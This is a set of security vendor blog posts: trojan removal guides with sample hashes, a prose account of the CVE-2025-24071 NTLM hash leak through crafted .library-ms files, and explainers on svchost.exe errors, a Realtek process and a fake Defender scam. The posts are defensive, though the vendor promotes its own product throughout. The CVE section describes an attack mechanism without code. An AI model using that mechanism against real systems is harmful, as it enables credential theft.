This guide will help you remove this threat completely. Follow these step-by-step instructions to eliminate the threat. We’ll start with manual methods you can try right now.

What Is Trojan:Win32/Suschil!rfn?

Trojan:Win32/Suschil!rfn is a dangerous malware that targets Windows systems. It’s designed to steal your personal information. The malware can access your files, passwords, and browsing data.

This trojan often disguises itself as legitimate software. It might appear as a normal Windows process or application file. Once installed, it runs silently in the background.

The malware can open backdoors for hackers. This means criminals can access your computer remotely. They can install additional malware or steal sensitive data.

Similar to other trojan malware threats, Suschil!rfn uses social engineering tactics. It tricks users into downloading infected files. Common infection methods include cracked games, pirated software, and suspicious email attachments.

Signs Your Computer Is Infected

You might notice these symptoms if Trojan:Win32/Suschil!rfn has infected your system:

• Slow system performance – Your computer takes longer to start up and respond
• High CPU usage – Task Manager shows processes consuming excessive resources
• Unusual network activity – Unexpected data transfers or network connections
• Browser issues – Redirects to suspicious websites or unwanted pop-ups
• Antivirus alerts – Repeated detections of the same threat
• System crashes – Frequent blue screens or unexpected shutdowns
• Missing files – Important documents or programs disappear

These symptoms are common across many information stealing malware infections. If you notice multiple symptoms, immediate action is required.

Manual Removal Steps

Manual removal requires careful attention to detail. Follow each step exactly as described. Make sure to complete all steps to ensure complete removal.

Step 1: Disconnect from the Internet

Your first priority is cutting off the malware’s communication. Disconnect your computer from the internet immediately. This prevents the trojan from sending stolen data to hackers.

Unplug your ethernet cable or disable your Wi-Fi connection. This also stops the malware from downloading additional threats.

1. Click the network icon in your system tray
2. Select “Disconnect” for your current connection
3. Alternatively, unplug your ethernet cable

Step 2: Boot into Safe Mode

Safe Mode loads Windows with minimal drivers and services. This makes it easier to identify and remove malicious processes.

1. Press Windows key + R to open the Run dialog
2. Type “msconfig” and press Enter
3. Go to the Boot tab
4. Check “Safe boot” and select “Minimal”
5. Click OK and restart your computer

Your computer will boot into Safe Mode. The desktop will look different than usual. This is normal.

Step 3: Identify Malicious Processes

Open Task Manager to check for suspicious processes. Look for processes that you don’t recognize or that consume high CPU resources.

1. Press Ctrl + Shift + Esc to open Task Manager
2. Click the “Processes” tab
3. Look for processes with suspicious names or high resource usage
4. Right-click suspicious processes and select “End task”
5. Note the process names and file locations

Be careful not to end legitimate Windows processes. If you’re unsure about a process, research it online before ending it.

Step 4: Delete Malicious Files

Now you need to locate and delete the actual malware files. Trojan:Win32/Suschil!rfn typically hides in these locations:

1. Press Windows key + E to open File Explorer
2. Enable “Show hidden files” in the View tab
3. Navigate to these common malware locations:

Common file locations:

• C:\Users\[username]\AppData\Local\Temp
• C:\Users\[username]\AppData\Roaming
• C:\Windows\Temp
• C:\Windows\System32
• C:\Program Files
• C:\Program Files (x86)

Look for files with random names or suspicious extensions. Delete any files you identified in Step 3. Empty the Recycle Bin when finished.

Step 5: Clean Registry Entries

Trojans often modify Windows Registry to maintain persistence. You need to remove these entries manually.

1. Press Windows key + R to open Run dialog
2. Type “regedit” and press Enter
3. Navigate to these registry locations:

Registry locations to check:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Look for entries with suspicious names or file paths. Right-click and delete any entries related to the malware.

Warning: Be extremely careful when editing the registry. Deleting wrong entries can damage your system. Only remove entries you’re certain are malicious.

Step 6: Check Scheduled Tasks

Malware often creates scheduled tasks to restart automatically. You need to find and remove these tasks.

1. Press Windows key + R to open Run dialog
2. Type “taskschd.msc” and press Enter
3. Expand “Task Scheduler Library” in the left panel
4. Look for tasks with suspicious names or unknown publishers
5. Right-click suspicious tasks and select “Delete”

Pay attention to tasks that run at startup or have unusual triggers. These are likely malware-related.

Step 7: Clear Browser Data

Trojans often target browsers to steal login credentials and personal data. Clear all browser data to remove any traces.

1. Open each browser you use (Chrome, Firefox, Edge)
2. Access browser settings
3. Find “Clear browsing data” or “Privacy” settings
4. Select all data types and clear everything
5. Restart your browser

This process is similar to dealing with heuristic virus infections that target browser data.

Step 8: Reset System Settings

Return your system to normal boot mode and verify the infection is gone.

1. Press Windows key + R to open Run dialog
2. Type “msconfig” and press Enter
3. Go to the Boot tab
4. Uncheck “Safe boot”
5. Click OK and restart your computer

After restart, reconnect to the internet and run a full system scan with your antivirus software.

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of trojan threats. Professional anti-malware software can find hidden components and registry changes that you might miss.

GridinSoft Anti-Malware specializes in detecting sophisticated threats like Trojan:Win32/Suschil!rfn. The software uses advanced heuristic analysis to identify malware behavior patterns.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Browser Cleanup

Remove Malicious Browser Extensions

Trojans often install malicious browser extensions to monitor your online activities. These extensions can steal passwords and personal information.

Reset Your Browser

If you suspect browser-based compromise, reset your browser completely. This removes all extensions, settings, and stored data.

How to Prevent Future Infections

Prevention is always better than removal. Follow these security practices to protect your system from future trojan infections.

Avoid Suspicious Downloads

Never download software from untrusted sources. Stick to official websites and verified download platforms. Be especially careful with cracked games and pirated software, as these are common infection vectors.

Keep Your System Updated

Install Windows updates regularly. Security patches fix vulnerabilities that malware exploits. Enable automatic updates for critical security fixes.

Use Reliable Antivirus Software

Install reputable antivirus software with real-time protection. Keep virus definitions updated. Run regular system scans to catch threats early.

Be Cautious with Email Attachments

Never open attachments from unknown senders. Scan all attachments with antivirus software before opening. Be suspicious of unexpected attachments, even from known contacts.

Enable Windows Defender

Windows Defender provides basic protection against malware. Don’t disable Windows Defender unless you have a compelling reason and alternative protection.

Create System Backups

Regular backups protect your data if malware strikes. Use Windows Backup or third-party backup solutions. Store backups on external drives or cloud storage.

Frequently Asked Questions

What is Trojan:Win32/Suschil!rfn and why is it dangerous?

Trojan:Win32/Suschil!rfn is a malicious program that steals personal information and provides unauthorized access to your computer. It’s dangerous because it can steal passwords, financial data, and personal files. The trojan also creates backdoors for additional malware infections.

How did Trojan:Win32/Suschil!rfn get on my computer?

This trojan typically spreads through infected downloads, email attachments, or bundled software. Common sources include cracked software, pirated games, and suspicious email attachments. It might also come from visiting compromised websites or clicking malicious ads.

Can I remove Trojan:Win32/Suschil!rfn manually?

Yes, you can remove it manually by following the steps in this guide. However, manual removal requires technical knowledge and careful attention to detail. Missing any components can leave your system vulnerable. For complete removal, consider using professional anti-malware software.

Is it safe to delete processes related to Suschil!rfn?

Yes, it’s safe to delete malicious processes once you’ve identified them correctly. However, be careful not to end legitimate Windows processes. If you’re unsure about a process, research it online or use Task Manager’s “Properties” option to check file details.

How can I prevent Trojan:Win32/Suschil!rfn infections?

Avoid downloading software from untrusted sources, keep your system updated, use reliable antivirus software, and be cautious with email attachments. Regular system backups also help protect your data if infections occur.

What if manual removal doesn’t work?

If manual removal fails, the trojan might have deep system integration or rootkit capabilities. In such cases, professional anti-malware tools like GridinSoft Anti-Malware provide more comprehensive removal. These tools can detect hidden components that manual methods might miss.

Should I reinstall Windows after removing the trojan?

Complete Windows reinstallation isn’t usually necessary if you’ve successfully removed all malware components. However, if you’re concerned about system integrity or if the infection was severe, a clean Windows installation provides the highest level of security assurance.

Can this trojan come back after removal?

The trojan can return if you don’t eliminate all components or if the infection source remains active. This is why it’s important to follow all removal steps completely. Installing reliable antivirus software and practicing safe computing habits prevents reinfection.

Related Trojan Threats

Trojan:Win32/Suschil!rfn belongs to a family of similar threats. Understanding related malware helps you recognize and prevent future infections.

Trojan:Win32/Kepavll!rfn is another variant that targets Windows systems. It uses similar infection methods and poses comparable threats to your personal data.

Trojan:Win32/Wacatac represents a different type of trojan that focuses on cryptocurrency theft. These threats often work together to maximize damage.

Trojan:Win32/Leonem is known for its persistence mechanisms. It’s particularly difficult to remove manually due to its deep system integration.

Other related threats include Trojan:Win32/Yomal!rfn and Trojan:Win32/Vundo. These trojans share similar characteristics and require similar removal approaches.

System Recovery Tips

After removing the trojan, your system might need additional recovery steps. These tips help restore normal functionality.

Check System Performance

Monitor your system performance after removal. The trojan might have damaged system files or changed critical settings. Use Windows System File Checker to repair corrupted files:

1. Open Command Prompt as administrator
2. Type “sfc /scannow” and press Enter
3. Wait for the scan to complete
4. Restart your computer if prompted

Update All Software

Make sure all your software is up to date. Outdated programs can provide entry points for malware. Focus on these critical updates:

• Windows operating system updates
• Web browser updates
• Antivirus software updates
• Adobe Flash and Java updates
• Microsoft Office updates

Change All Passwords

The trojan might have stolen your passwords. Change all important passwords, including:

• Online banking and financial accounts
• Email account passwords
• Social media passwords
• Shopping and e-commerce sites
• Work-related accounts

Use strong, unique passwords for each account. Consider using a password manager to generate and store secure passwords.

Conclusion

Trojan:Win32/Suschil!rfn is a serious threat that requires immediate attention. This guide provides comprehensive manual removal steps and prevention strategies.

Remember that prevention is always better than removal. Practice safe computing habits, keep your system updated, and use reliable security software.

If manual removal seems too complex, don’t hesitate to use professional anti-malware tools. GridinSoft Anti-Malware provides automated detection and removal of threats like Suschil!rfn.

Stay vigilant and keep your system protected. Regular maintenance and security awareness are your best defenses against malware infections.

The post Trojan:Win32/Suschil!rfn – Easy Ways to Remove It appeared first on Gridinsoft Blog.

This guide will help you remove this threat completely. Follow these step-by-step instructions to eliminate Trojan:Win32/Agent from your system. We’ll start with manual methods you can try right now, then show you faster automatic solutions.

What is Trojan:Win32/Agent?

Trojan:Win32/Agent is a sneaky piece of malware that hides inside what looks like normal software. Once it gets on your computer, it starts working in the background. You won’t see it running, but it’s busy stealing your information.

This trojan can grab your passwords, banking details, and personal files. It might also download other dangerous software to your computer. The “Agent” name is actually used for many different variants of this malware family. You might see names like Trojan-Downloader:W32/Agent.BRK or Trojan-Dropper:W32/Agent.PR.

The malware is similar to other trojan malware we’ve analyzed. Like many modern threats, it tries to stay hidden while doing maximum damage to your system.

Signs Your Computer is Infected

You might notice these symptoms if Trojan:Win32/Agent is on your system:

• Your computer runs much slower than before
• Unknown processes appear in Task Manager
• Files disappear or get corrupted
• Pop-up ads appear even when browsers are closed
• Your antivirus gets disabled or stops working
• Network activity increases without explanation
• New programs install themselves
• Browser settings change without permission

These signs are common with information-stealing malware and similar threats. The sooner you act, the less damage the malware can do.

Manual Removal Steps

Manual removal takes time but gives you complete control. These steps will help you find and delete Trojan:Win32/Agent manually. Each step is important, so don’t skip any of them.

Step 1: Restart in Safe Mode

Safe Mode prevents the malware from running while you clean your system. This makes removal much easier and safer.

1. Press Windows + R keys together
2. Type msconfig and press Enter
3. Click the Boot tab
4. Check Safe boot and select Minimal
5. Click OK and restart your computer

Your computer will start in Safe Mode. The desktop will look different, but this is normal.

Step 2: End Malicious Processes

First, you need to stop the trojan from running. Open Task Manager to find suspicious processes.

1. Press Ctrl + Shift + Esc to open Task Manager
2. Click the Processes tab
3. Look for processes with random names or high CPU usage
4. Right-click suspicious processes and select End task
5. Note down the process names and file locations

Common malicious process names include random letters and numbers. Be careful not to end important Windows processes. When in doubt, research the process name online.

Step 3: Delete Malicious Files

Now you need to find and delete the actual malware files. Agent trojans commonly hide in these locations:

1. Open File Explorer and navigate to C:\Users\[YourUsername]\AppData\Local\Temp
2. Delete any recently created files with suspicious names
3. Go to C:\Windows\Temp and delete suspicious files
4. Check C:\ProgramData for folders with random names
5. Look in C:\Users\[YourUsername]\AppData\Roaming for suspicious folders

Pay attention to files created around the time your problems started. Delete anything that looks suspicious or has random names. Empty your Recycle Bin when done.

Step 4: Clean Registry Entries

The trojan creates registry entries to start automatically. You need to remove these entries to prevent reinfection.

1. Press Windows + R and type regedit
2. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
3. Look for entries with suspicious names or paths
4. Right-click suspicious entries and select Delete
5. Repeat for HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Be very careful in the registry. Only delete entries you’re sure are malicious. Deleting the wrong entry can break your system.

Step 5: Check Startup Programs

Remove the malware from your startup programs list. This prevents it from running when Windows starts.

1. Press Ctrl + Shift + Esc to open Task Manager
2. Click the Startup tab
3. Look for programs with suspicious names or publishers
4. Right-click suspicious programs and select Disable
5. Note down the program names for further investigation

Unknown programs or those from suspicious publishers should be disabled. You can always re-enable legitimate programs later.

Step 6: Clear Browser Data

Agent trojans often modify browser settings and install extensions. Clean your browsers to remove any traces.

Reset your browsers to default settings:

Remove any suspicious browser extensions:

Step 7: Restart Normally

Once you’ve completed all steps, restart your computer normally:

1. Press Windows + R and type msconfig
2. Uncheck Safe boot in the Boot tab
3. Click OK and restart
4. Run a full system scan with your antivirus

Monitor your system for any returning symptoms. If problems persist, the manual removal may have missed some components.

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of Trojan:Win32/Agent variants. Professional anti-malware software can find hidden components and registry changes that you might miss.

GridinSoft Anti-Malware specializes in detecting trojans like Win32/Agent that hide deep in your system. The software uses advanced scanning techniques to find malware that traditional antivirus programs miss.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

How Trojan:Win32/Agent Spreads

Understanding how this malware spreads helps you avoid future infections. Agent trojans commonly arrive through these methods:

Email Attachments: Fake invoices, shipping notifications, or other business documents that contain the trojan. These emails often look legitimate but come from unknown senders.

Malicious Downloads: Free software, game cracks, or movies from untrustworthy websites. The trojan hides inside these downloads and installs silently.

Drive-by Downloads: Visiting compromised websites that exploit browser vulnerabilities. The malware downloads automatically without your knowledge.

Infected USB Drives: Plugging in infected external devices can transfer the malware to your computer. Always scan removable media before use.

Similar to other threats we’ve covered like fake virus alerts, these attacks rely on social engineering and user trust.

Prevention Tips

Preventing Trojan:Win32/Agent infections is easier than removing them. Follow these practical steps to protect your system:

Keep Software Updated: Install Windows updates and software patches promptly. Many trojans exploit known vulnerabilities that patches fix.

Use Reliable Antivirus: Install reputable antivirus software and keep it updated. Real-time protection can block trojans before they execute.

Be Careful with Downloads: Only download software from official websites. Avoid torrent sites and file-sharing platforms where malware is common.

Check Email Attachments: Never open attachments from unknown senders. Even familiar senders can have compromised accounts.

Enable Windows Defender: Don’t disable Windows Defender unless you have another reliable antivirus running.

Regular Backups: Back up important data regularly. This protects you from data loss if malware strikes.

Avoid Suspicious Links: Don’t click links in spam emails or pop-up ads. These often lead to malware download sites.

The tactics used by Agent trojans are similar to those in professional hacker email scams and other social engineering attacks.

Frequently Asked Questions

What is Trojan:Win32/Agent and why is it dangerous?

Trojan:Win32/Agent is a family of malicious programs that hide inside legitimate-looking software. They’re dangerous because they can steal your personal information, download other malware, and create backdoors for remote access. The “Agent” name covers many variants, each with different capabilities.

How did Trojan:Win32/Agent get on my computer?

Most commonly through email attachments, malicious downloads, or infected websites. The trojan disguises itself as useful software, documents, or media files. Once you run the infected file, it installs silently in the background.

Can I remove Trojan:Win32/Agent manually?

Yes, manual removal is possible using the steps in this guide. However, it requires technical knowledge and patience. Agent trojans often hide in multiple locations and can be tricky to remove completely. Automatic removal tools are usually more effective.

Is it safe to delete the files I find during manual removal?

Only delete files you’re certain are malicious. When in doubt, research the file name online or move suspicious files to a quarantine folder instead of deleting them immediately. Always backup important data before starting manual removal.

How can I prevent Trojan:Win32/Agent infections?

Keep your software updated, use reliable antivirus protection, avoid suspicious downloads, and be careful with email attachments. Don’t download software from untrusted sources, and always scan external devices before use.

What should I do if manual removal doesn’t work?

If the trojan keeps returning or you can’t find all the malicious files, use professional anti-malware software like GridinSoft Anti-Malware. These tools can detect hidden components and ensure complete removal.

Will Trojan:Win32/Agent steal my passwords and banking information?

Yes, many Agent variants are designed to steal sensitive information including passwords, banking details, and personal files. If you suspect infection, change your important passwords immediately and monitor your accounts for suspicious activity.

Can Trojan:Win32/Agent download other malware to my computer?

Absolutely. Agent trojans often serve as downloaders that fetch additional malware. This can include ransomware, cryptominers, or other trojans. Quick removal is essential to prevent further infections.

Quick Removal Summary

If you need to remove Trojan:Win32/Agent quickly, here’s what to do:

The infection methods used by this trojan are similar to those found in HackTool:Win32/AutoKMS and other malware that comes from cracked games and software.

Remember that trojans like Win32/Agent are part of a larger ecosystem of malware. They often work alongside other threats like heuristic virus detections and various Trojan:Win32/Wacatac variants.

• Trojan.Win64.Agent.sa: 070d2e89376568600c45e073ddcde8c2b738e70c32b2e97464542a4182b50e62
• Trojan.Win64.Agent.cl: e1924a6288e3fe2492c51d64aea9ee8e60f6e5f2ddcdca60a5bfb159cf4d6d44
• Trojan.Win32.Agent.cld: 5f6af1380c32c6c80019d99ac2f632c99320698c8845c13272c0c25908cd9f88
• Trojan.Win32.Agent.dg: 2bcea7456d4057b8ac292c0413ba163ce4a47e66e27bfc5c2af2431f8eb24f12
• Trojan.Win64.Agent.cl: 797253add1f9fde1ecdbc49b02f4529746aa1b6005fcbd3817adddcf3e295eb9
• Trojan.Win32.Agent.oa!s1: 3910e181bb31bc0781a4cac6575ab801116630639915553ad831b48d2f66fc87
• Trojan.Win32.Agent.cl: 01b299a9816ca75485203303bc77c1cd1c9f164fe68738e720deae4c32f2423e
• Trojan.Win32.Agent.oa!s1: 2e6346ce1adf15bffca31a0c96274f615e3e0bbf53235e4b4c85555bc012b9d9
• Trojan.Win32.Agent.cld: 93500577a56b31a3568d276d28c86149e4c6659ea402aec8016bb68c97d70cb1
• Trojan.Win32.Agent.cl: b383eff36dde3b5ad09dcc4ab2f9ac2e66ed8bb36fa155ad8fcd3ebfa86b2493

Related Threats

Trojan:Win32/Agent is part of a family of Windows trojans. You might also encounter:

• Trojan:Win32/Leonem – Another variant with similar behavior
• Trojan:Win32/Kepavll.RFN – Related trojan family
• Trojan:Win32/Vundo.Gen.D – Browser hijacker variant

These threats use similar infection methods and require comparable removal techniques. Understanding one helps you deal with others.

Stay vigilant and keep your security software updated. Trojans like Win32/Agent are constantly evolving, but good security practices will protect you from most threats.

The post How to Remove Trojan:Win32/Agent from Windows 11 appeared first on Gridinsoft Blog.

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Overview

Cybersecurity agencies have published information about the CVE-2025-24071 vulnerability. This is a critical vulnerability in Windows File Explorer, with a CVSS score of 7.5. It affects multiple versions of Windows, including Windows 10, Windows 11, and various Windows Server versions. The vulnerability arises from Windows Explorer’s implicit trust and automatic parsing of .library-ms files, which are XML-based files used to define search or library locations within the operating system.

The core issue is that when a .library-ms file, crafted with a malicious SMB (Server Message Block) path, is embedded in a RAR or ZIP archive and subsequently extracted, Windows Explorer automatically processes it for indexing, previews, or thumbnails.

This processing triggers an SMB authentication request to the attacker-controlled server, resulting in the disclosure of the user’s NTLMv2 hash. This hash can then be used for attacks such as pass-the-hash or offline NTLM hash cracking, posing significant security risks.

Technical Details

The PoC for CVE-2025-24071 has been released for educational purposes only and is publicly available on GitHub in the eponymous repository, created by a malware and CTI analyst known as 0x6rss. The PoC is implemented as a Python script, designed to demonstrate the exploitation process. The PoC involves creating a specially crafted .library-ms file that includes a tag pointing to an attacker-controlled SMB server (e.g., \\192.168.1.116\shared). This file is compressed within a RAR or ZIP archive.

Upon extraction of the archive, Windows Explorer automatically initiates processing of the .library-ms file. This is observed through tools like Procmon, where processes such as Explorer.exe and SearchProtocolHost.exe perform operations like CreateFile, ReadFile, QueryBasicInformationFile, and CloseFile for indexing purposes.

The automatic processing triggers an SMB authentication handshake, captured via Wireshark with an SMB filter (smb or smb2). This includes an SMB2 Negotiate Protocol Request from the victim to the attacker server, followed by an SMB2 Session Setup Request (NTLMSSP_AUTH), which leaks the victim’s NTLMv2 hash. The key feature of this vulnerability is that no user interaction is required beyond extracting the archive, making this a zero-click exploit in certain scenarios.

Exploitation in the Wild and Microsoft Response

Research suggests that CVE-2025-24071 is not only theoretical but actively exploited in the wild. In the aforementioned blog, the author reports that the vulnerability may have been sold on a forum by a threat actor named “Krypt0n,” known for developing EncryptHub Stealer. An X post further corroborates this, detailing how the exploit is configured on a local server (e.g., VPS) with the attacker’s IP and share, triggering hash leaks when accessed by Explorer without file opening.

Microsoft has addressed this vulnerability in the March 2025 Patch Tuesday update, released earlier this month. The patch details are referenced in the Microsoft Security Update Guide. Users of vulnerable systems are advised to upgrade to an up-to-date version of the OS.

The post CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Uncovered, Patch Now appeared first on Gridinsoft Blog.

Background on svchost.exe

Svchost.exe, or Service Host, is a core Windows process introduced in the Windows NT family to host multiple system services within a single process, enhancing resource efficiency. It loads Dynamic Link Libraries (DLLs) to run services, such as network management, Windows Update, and firewall operations. Multiple instances of svchost.exe are normal, each managing different service groups, and it is typically located at C:\Windows\System32\ or C:\Windows\SysWOW64\ for 64-bit systems. However, malware can masquerade as svchost.exe, making it crucial to verify its legitimacy.

The error message, like “The instruction at 0x00007FFD55C5A126 referenced memory at 0x0000000000000078. The memory could not be read,” indicates a memory access violation, likely due to an attempt to read an invalid or unallocated memory address (0x78 is a very low address, often null or kernel-related). Such errors are commonly associated with corrupted system files, interrupted updates, or malware interference.

Games Crashes

Game-related crashes typically involve the game’s executable crashing due to issues like DirectX 12 settings or DLL conflicts.

Games can indirectly strain system resources, potentially exposing underlying issues, such as services hosted by svchost.exe failing under load. For instance, services like Windows Update or Background Intelligent Transfer Service (BITS) might malfunction, leading to errors. However, the error’s timing during gameplay suggests it may not be directly game-related but rather a system condition exacerbated by resource usage.

Potential Malware Risk from Mods and Custom Content

Mods and CC are often hosted on community sites, and malicious files can disguise themselves as legitimate downloads, potentially infecting the system. Research indicates svchost.exe errors can result from malware injecting itself into the process or corrupting system services. Given this, it’s prudent to investigate for malware, especially since the user noted downloading from potentially unverified sources.

Analyzing the Error: Common Causes and Fixes

Svchost.exe errors, particularly memory-related ones, are frequently linked to Windows Update issues. For example, interrupted or corrupted updates can cause services like Windows Update to fail, leading to crashes PC Hell: How to Fix SVCHOST.EXE Application Error. Other causes include:

• Corrupted system files, which can be repaired using System File Checker (SFC).
• Malware infections, which may require antivirus scans.
• Resource conflicts, especially during high system load, such as gaming.

To determine the specific svchost.exe instance causing the error, the user could check the Task Manager’s Details tab, right-click the process, and view its properties for the command line (e.g., “svchost.exe -k netsvcs”), revealing the service group. However, given the error terminates the process, capturing this information may require monitoring tools or debugging, which is beyond typical user capability.

Recommended Mitigation Steps

Step 1. Run a Full Antivirus Scan

Use a Gridinsoft Anti-Malware to scan for malware, focusing on recently downloaded files.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Step 2. Check and Install Windows Updates

Navigate to Settings > Update & Security > Windows Update and install any pending updates. This addresses potential update-related errors.

If updates fail, consider manually downloading and installing critical updates from Microsoft’s update catalog.

Step 3. Run System File Checker (SFC)

Open Command Prompt as an administrator and run: sfc /scannow. This tool scans and repairs corrupted system files, potentially fixing svchost.exe errors.

If SFC finds issues, follow with DISM /Online /Cleanup-Image /RestoreHealth for deeper system repair.

Step 4. Monitor and Troubleshoot Further

Check the Event Viewer (type eventvwr in the Start menu) for errors related to svchost.exe, noting the service name for deeper investigation.

If the issue persists, consider resetting Windows Update components by stopping the Windows Update service, renaming the SoftwareDistribution folder, and restarting the service.

Step 5. Game-Specific Checks

Ensure your game is up to date via Steam or its launcher. Verify game file integrity to rule out corruption (Steam: Right-click game > Properties > Local Files > Verify integrity of game files).

Disable overlays (e.g., Steam Overlay, NVIDIA GeForce Experience) during gameplay, as they can sometimes cause system conflicts.

Conclusion

It’s worth noting that svchost.exe errors are not typically user-facing; they usually manifest as system instability rather than pop-ups. The error’s visibility might suggest an interaction between the game and a system service, possibly through resource contention or a misconfigured service.

The concern about malware is justified, as community-driven content like mods can be risky. To mitigate future risks, always download from reputable sites, such as official mod repositories, and use sandboxing tools if available to test new downloads. Regular system maintenance, including updates and scans, is also recommended to prevent such issues.

So, the svchost.exe error is likely a system-level issue, potentially exacerbated by recent downloads and not directly caused by Rise of the Tomb Raider. By following the outlined steps—antivirus scan, system updates, and file repairs—the user can address the root cause. If issues persist, further investigation via Event Viewer may be necessary. This approach ensures system health while addressing gaming-related concerns.

The post Svchost.exe Application Error appeared first on Gridinsoft Blog.

RtkAudUService64.exe Overview

RtkAudUService64.exe is a process associated with Realtek High Definition Audio, one of the most commonly used audio drivers in Windows-based systems. Realtek provides built-in audio solutions for a vast range of motherboards, laptops, and pre-built desktops.

This specific process is responsible for managing and enhancing audio playback, ensuring that features like equalization, environmental effects, and microphone noise reduction work properly. It is a legitimate system process and is generally safe to run. The executable is typically located in “C:\Program Files\Realtek\Audio\HDA” and is installed alongside the Realtek audio driver.

While it runs in the background, it ensures smooth audio performance and provides compatibility between the Realtek Audio Console and the hardware driver itself. In most cases, users do not need to interact with this process directly, as it operates autonomously to maintain audio stability and functionality. And obviously, it causes no issues and no CPU load to talk about when everything operates as intended.

High CPU Usage and Troubleshooting

Some users report that RtkAudUService64.exe occasionally consumes excessive CPU resources, causing performance issues and even overheating. Normally, audio processes should not require much processing power. However, under specific circumstances, this service can use an abnormal amount of CPU. This issue is more noticeable on older or underpowered systems, especially when multiple audio enhancements are enabled. Features like noise suppression, spatial sound, or equalizers can further strain system performance.

In the modern era of powerful CPUs, high resource usage by an audio service is abnormal and usually indicates a driver issue. Some users have reported that after a Windows update or a Realtek driver update, this process began consuming excessive CPU. In some cases, this led to system lag or increased temperatures.

To resolve this issue, the most common solution is to reinstall or update the Realtek drivers. Uninstalling the existing driver from Device Manager and letting Windows reinstall a fresh copy often resolves the problem. In some cases, rolling back to a previous system restore point before the issue started may be necessary.

Is RtkAudUService64.exe a Virus?

Foremost, RtkAudUService64.exe is not a virus. It is a legitimate process created by Realtek Semiconductor Corp., one of the leading manufacturers of onboard audio solutions. However, because it is widely recognized and commonly found in Windows systems, sometimes malware developers may disguise malicious software under a similar name to avoid detection. It’s a common practice among coin miner viruses and backdoors.

To ensure the process running on your system is legitimate, check its file location. If RtkAudUService64.exe is not in the “C:\Program Files\Realtek\Audio\HDA” directory, it may be a counterfeit process. Additionally, if you notice unexpected high CPU usage, system slowdowns, or other suspicious behavior, it is advisable to scan your system using reliable antivirus software. However, high CPU usage by RtkAudUService64.exe does not mean that you totally have malware.

Should I Disable/Delete the RtkAudUService64.exe?

For most users, there is no need to disable or remove RtkAudUService64.exe, as it plays a crucial role in maintaining stable audio functionality. However, there are certain situations where disabling it may be necessary. After some Windows updates, users have reported compatibility issues where the service begins causing excessive CPU usage or interfering with normal audio playback.

Similarly, some poorly optimized driver releases from Realtek have occasionally introduced performance problems. These issues may persist until a fix is provided. In such cases, temporarily disabling this process can serve as a workaround until a proper update is released.

Disabling this service, however, comes with trade-offs. All Realtek audio enhancements, including equalization, environmental effects, and noise suppression, will cease to function. Additionally, the Realtek Audio Console, which provides a user-friendly interface for adjusting audio settings, will no longer work. Some users have also reported intermittent audio dropouts every few seconds after disabling the service, though this does not happen consistently.

If disabling it becomes necessary, it can be done via Task Manager or by preventing it from starting up in Windows Services (services.msc). However, the better long-term solution is to wait for an official driver update from Realtek or the motherboard manufacturer. Removing this service permanently can lead to an inconsistent audio experience.

Another case where you can safely disable the RtkAudUService64.exe process is if you are not using the built-in audio device. For example, if you are using an external usb/pci audio interface, such as Behringer, PreSonus, or M-Audio, you can completely disable the Realtek audio device and all related processes. This will not affect the sound output and effects processing, as this is handled by a separate DAC installed in the audio interface.

The post RtkAudUService64.exe appeared first on Gridinsoft Blog.

Windows Defender Security Center Scam Overview

“Windows Defender Security Center” is a fake malware alert that appears on various scam websites. Users often land on these pages unintentionally, while browsing other websites. In certain cases, a browser hijacker may be responsible. Such viruses have leading users to sketchy pages as their main target, and scams is just another destination.

The scheme is simple: the fake alert warns the victim, that its system is infected with multiple viruses. It urges calling a provided number, which typically connects the victim to a call center, usually in another country.

There, scammers insist that the computer is severely compromised and offer a «solution». They ask the victim to install a potentially an app, that will resolve the problem. But instead of a solution, users get an unwanted application (PUA). Once installed, this software runs a fake scan, detects non-existent threats, and demands payment for an “activation” that does nothing.

How Windows Defender Security Scam Operates?

First part of the scam takes place on a website that pretends being a Microsoft malware alert notification of some kind. It is quite easy to get one opened in the background tab while browsing sketchy websites with pirated movies or games. The title of the website – Windows Defender Security Center – is what has given the scam campaign the name.

When an unsuspecting user clicks anything on that website, it extends into a fullscreen mode, and starts playing a scary AI-generated voice message. It states something along the lines of “your computer is infected and we locked it to stop the malware, contact our support immediately”. The exact text may change from one scam site to another, but the overall story is always the same.

One trick that this site pulls out is the altered out-from-fullscreen key sequence. F11 or short Esc button pressing do nothing, as con actors who designed that page changed it to long Esc press. And that is a way to get out of that scam with no calls to a “tech support”.

